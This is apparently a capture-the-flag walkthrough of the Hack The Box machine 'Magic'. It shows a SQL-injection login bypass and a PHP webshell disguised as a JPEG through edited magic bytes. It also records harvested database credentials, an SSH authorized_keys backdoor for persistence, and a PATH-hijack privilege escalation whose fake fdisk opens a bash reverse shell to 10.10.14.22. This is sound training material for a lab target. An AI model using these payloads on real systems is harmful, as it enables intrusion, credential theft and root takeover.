Magic HTB
IP
10.10.10.185initial nmap scan
sudo nmap -p- --min-rate 10000 10.10.10.185 | cut -d"/" -f1 | tr '\n' ','Ports open
22,80Lets run a more in-depth scan of the targets ports
sudo nmap -sCV -p22,80 -oA tcp_ports 10.10.10.185results
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Magic Portfolio
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelwhat can we see
SSH is open
we have a HTTP web server Apache 2.4.29
ubuntu server
Let's check out the web server
Looks like
we have the ability to login in, but cant create an account
the ability to upload images
we can see GIFS and JPEG
Given the name of the box Magic could this be a reference to magic bytes, can we upload a reversehsell and bypass any restrictions using magic bytes? maybe
for good measures Lets run feroxbuster and create and account
feroxbuster
feroxbuster -u http://10.10.10.185 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -o dirs_http.txtresults
301 GET 9l 28w 313c http://10.10.10.185/images => http://10.10.10.185/images/
200 GET 2l 119w 12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200 GET 2l 87w 2439c http://10.10.10.185/assets/js/breakpoints.min.js
200 GET 118l 277w 4221c http://10.10.10.185/login.php
200 GET 151l 677w 68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200 GET 835l 1757w 16922c http://10.10.10.185/assets/css/main.css
200 GET 88l 506w 34251c http://10.10.10.185/images/fulls/2.jpg
200 GET 209l 457w 32922c http://10.10.10.185/images/fulls/1.jpg
200 GET 2l 1276w 88145c http://10.10.10.185/assets/js/jquery.min.js
301 GET 9l 28w 313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200 GET 23059l 117663w 9521972c http://10.10.10.185/images/uploads/7.jpg
200 GET 60l 207w 4051c http://10.10.10.185/
301 GET 9l 28w 317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301 GET 9l 28w 316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301 GET 9l 28w 321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
301 GET 9l 28w 324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301 GET 9l 28w 327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301 GET 9l 28w 313c http://10.10.10.185/images => http://10.10.10.185/images/
200 GET 587l 1232w 12433c http://10.10.10.185/assets/js/util.js
200 GET 16l 41w 280c http://10.10.10.185/assets/css/noscript.css
200 GET 390l 896w 8862c http://10.10.10.185/assets/js/main.js
200 GET 2l 87w 2439c http://10.10.10.185/assets/js/breakpoints.min.js
200 GET 2l 51w 1851c http://10.10.10.185/assets/js/browser.min.js
200 GET 2l 119w 12085c http://10.10.10.185/assets/js/jquery.poptrox.min.js
200 GET 118l 277w 4221c http://10.10.10.185/login.php
200 GET 60l 207w 4053c http://10.10.10.185/index.php
200 GET 209l 457w 32922c http://10.10.10.185/images/fulls/1.jpg
200 GET 88l 506w 34251c http://10.10.10.185/images/fulls/2.jpg
200 GET 835l 1757w 16922c http://10.10.10.185/assets/css/main.css
200 GET 151l 677w 68311c http://10.10.10.185/images/uploads/magic-hat_23-2147512156.jpg
200 GET 192l 1093w 88071c http://10.10.10.185/images/fulls/5.jpeg
200 GET 255l 1421w 121103c http://10.10.10.185/images/uploads/magic-wand.jpg
200 GET 296l 2079w 173684c http://10.10.10.185/images/uploads/magic-1424x900.jpg
200 GET 2l 1276w 88145c http://10.10.10.185/assets/js/jquery.min.js
301 GET 9l 28w 321c http://10.10.10.185/images/uploads => http://10.10.10.185/images/uploads/
200 GET 490l 2867w 223637c http://10.10.10.185/images/uploads/logo.png
301 GET 9l 28w 313c http://10.10.10.185/assets => http://10.10.10.185/assets/
200 GET 27l 59w 782c http://10.10.10.185/assets/js/upload.js
200 GET 108l 217w 2136c http://10.10.10.185/assets/css/upload.css
200 GET 3315l 6597w 390337c http://10.10.10.185/images/fulls/6.jpg
200 GET 1118l 7764w 656671c http://10.10.10.185/images/uploads/trx.jpg
200 GET 6721l 34616w 2627822c http://10.10.10.185/images/fulls/3.jpg
302 GET 0l 0w 0c http://10.10.10.185/logout.php => index.php
200 GET 8189l 47626w 2547702c http://10.10.10.185/images/uploads/giphy.gif
200 GET 23059l 117663w 9521972c http://10.10.10.185/images/uploads/7.jpg
200 GET 60l 207w 4052c http://10.10.10.185/
302 GET 84l 177w 2957c http://10.10.10.185/upload.php => login.php
301 GET 9l 28w 316c http://10.10.10.185/assets/js => http://10.10.10.185/assets/js/
301 GET 9l 28w 317c http://10.10.10.185/assets/css => http://10.10.10.185/assets/css/
301 GET 9l 28w 324c http://10.10.10.185/assets/css/images => http://10.10.10.185/assets/css/images/
301 GET 9l 28w 327c http://10.10.10.185/assets/css/images/ie => http://10.10.10.185/assets/css/images/ie/
301 GET 9l 28w 318c http://10.10.10.185/assets/sass => http://10.10.10.185/assets/sass/
301 GET 9l 28w 323c http://10.10.10.185/assets/sass/libs => http://10.10.10.185/assets/sass/libs/
/login.php
we can see the following
Let's catch the request with burp and see if we can bypass auth
we do find SQLi injection that allows us to bypass authentication
this is what our request looks like
the query would look something like
SELECT * from users where username = '' or 1=1 -- -and password = 'admin';as you can see we
1=1condition always evals to True by passing the need for a valid username, and the-- -indicates a comment in SQL so everything after this is ignored (the password)
/upload.php
we are bought to /upload.php where we have the ability to upload a image to the server,
Let's consider a few things
php runs on the server, so we would want to run a php reverse-shell (pentest monkeys)
name of the box being magic, good indication that we will have to add a magic byte to the file so the server things we are sending a jpeg (could do this in burp)
Lets set up our payload and shell
we will use pentest monkeys reverse-shell
p /usr/share/webshells/php/php-reverse-shell.php ./Lets change the call back IP and port
set up our listner
rlwrap -cAr nc -lvnp 9001we need to edit the hex value of our file, we can use a tool like
hexedit, we need to edit the first 4 bytes and replace them with that of a jpeg file
here is a list of 'file magic numbers'
https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5from this list we can see the magic byte in hex is
Now we need to replace the first 4 bytes in a php reverse-shell to match of those above
hexeditor php-reverse-shell.phpNow we can edit the magic byte
our file is ready to be uploaded (we'll almost)
While uploading our file lets catch the request with burp
Notice we added a .jpeg file extension, this should breeze past the restriction
Now we just need to execute our reverse-shell, in the url bar
http://10.10.10.185/images/uploads/php-reverse-shell.php.jpeghmmm that did not go to plan
we bypassed the filters, but our php file is being treated as an image, we have no functionality
Lets try a simple cmd php webshell
same as before
copy into our working directory
cp /usr/share/webshells/php/simple-backdoor.php ./edit the magic byte with
hexeditorupload and catch with burp
head over to
http://10.10.10.185/images/uploads/cmd.php.jpegwe can see the following
Lets see if we can get any system commands
http://10.10.10.185/images/uploads/cmd.php.jpeg?cmd=whoamiwe can send commands to the target server
awesome from here we can establish a reverse-shell
Now lets establish a connection using bash, within the url bar
we now have a shell on the system
Looking in the /var/www/Magic we can find db.php5 when we cat it out we can see possible credentials
theseus: iamkingtheseusif we look within the /home directory we can find the user theseus
lets see if we can access the account
# we need pty
python3 -c "import pty;pty.spawn('/bin/bash')"
su theseus
no luck
Since we found credentials to a database would be goo practice to see if any ports are listening internally
netstat -ano
we can see port 3306 (MySQL) and port 631 (most likely IPP Internet Printing Protocol)
Lets see if we can connect to the mysql database
mysqlunfortunately the MySQL command is not installed on the machine
lets see if we can find anything related to mysql
locate mysqlin among the output we do find something interesting
/usr/bin/mysql_config_editor
/usr/bin/mysql_embedded
/usr/bin/mysql_install_db
/usr/bin/mysql_plugin
/usr/bin/mysql_secure_installation
/usr/bin/mysql_ssl_rsa_setup
/usr/bin/mysql_tzinfo_to_sql
/usr/bin/mysql_upgrade
/usr/bin/mysqladmin
/usr/bin/mysqlanalyze
/usr/bin/mysqlbinlog
/usr/bin/mysqlcheck
/usr/bin/mysqld_multi
/usr/bin/mysqld_safe
/usr/bin/mysqldump
/usr/bin/mysqldumpslow
/usr/bin/mysqlimport
/usr/bin/mysqloptimize
/usr/bin/mysqlpump
/usr/bin/mysqlrepair
/usr/bin/mysqlreport
/usr/bin/mysqlshow
/usr/bin/mysqlslapLooks like we have found some MySQL tools we can utilize more notably the
/usr/bin/mysqldump
Lets see if we can dump the database
mysqldump -u theseus -p --all-databasesresults
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;
--
-- Current Database: `Magic`
--
CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;
USE `Magic`;
--
-- Table structure for table `login`
--
DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `login`
--
LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2024-01-09 1:36:15
Looks like we may have found some valid credentials
admin: Th3s3usW4sK1ngsince we have not found a admin user safe to say this could be user theseus password
su theseuswhich it is
Lets check for sudo privileges
sudo -l
we cant run sudo on the machine
Lets get some persistence on the machine via SSH
Lets generate our ssh keys (local machine)
mkdir .ssh
ssh-keygenlets create a authorized_keys file on the targets
.sshdirectory, and copy our public key over
touch authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCSlmBUVzNP7JWZkjJvtj5UFJOPCXXW7aW8BUfouwewcOl1TTzzd75qOMDIxOO/ndUjIm0rSn2Wc6nBsdBU5wT5ImNyoPPzlrwdGMKuhZDylufYLh+Q37dSma6IbWDV2U6NXQ3lNc0L2qLsxAfeZuhdlMaAWn/2NfReJS2re2axTwfNA9w0TECEZ7lIQtcxNjEKqMWwiE7QIu3EmbXd6b9jXQ9XjnGp7JheYXuzjWUyQXxAj61wK6LqBBpAYdIUcxKkMAVNEouzBoU7ZuvcuLlcGe+niVl7qoGyShEXsrKunlJcju2yigGqEEfCjvLjaKP8Q+EeGYMkjgjiJsn7m1fkHkQ4XAlhJp35fNtvqjaL6VIWME29OL0v2N1n1ZzMkzmMwVRX4GYW7hz+d/R8/rvnPyL/1Te8j9Xqs5NcLo9JHqXJPiv5uclKNA0h8HTVSO/er5dayO9CgEqRi6OiNalxo1oTycFOe5A4sYDKW9jJVsa1GjgT983Z3iOcVixTX7c=" > authorized_keysNow lets give our private key the appropriate permissions and see if we can log in via SSH
chmod 600 id-rsa
ssh -i id-rsa theseus@10.10.10.185we now have access via SSH
When searching for SUID files we can see something interesting
find / -type f -perm /4000 2>/dev/nullwe find an odd program
/bin/sysinfochecking the permission shows
we can see anyone within the users group and execute this program
since we are part of the users group we can execute the command
running the command
/bin/sysinfoit just output a bunch of system information
but its odd lets run the tool along with ltrace which prints out the calls made outside of the binary
ltrace /bin/sysinfolooking through the output we can see something interesting
popen is another way to open a process on linux, but the interesting part is that the binary is making a call to fdisk , but its not specifying the full path, which leaves this binary possibly vulnerable to path hijacking
Lets test this theory
Let's create a reverse-shell in the
/dev/shmdirectory and save it in an executable filefdisk
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.14.22/9001 0>&1' > fdisk
chmod +x fdiskLets start a listener and execute the file to see if it attempts a connection back to us
#local machine
rlwrap -cAr nc -lvnp 9001
# target machine
./fdisk
we can see we have a successful connection back to the target server
Now we can update our current path to
/dev/shm
export PATH="/dev/shm:$PATH"Now when we run sysinfo, it should execute
fdiskwhere our reverse-shell resides, and we should gain a reverse-shell as root
sysinfoif we look back at our shell we should be root
Last updated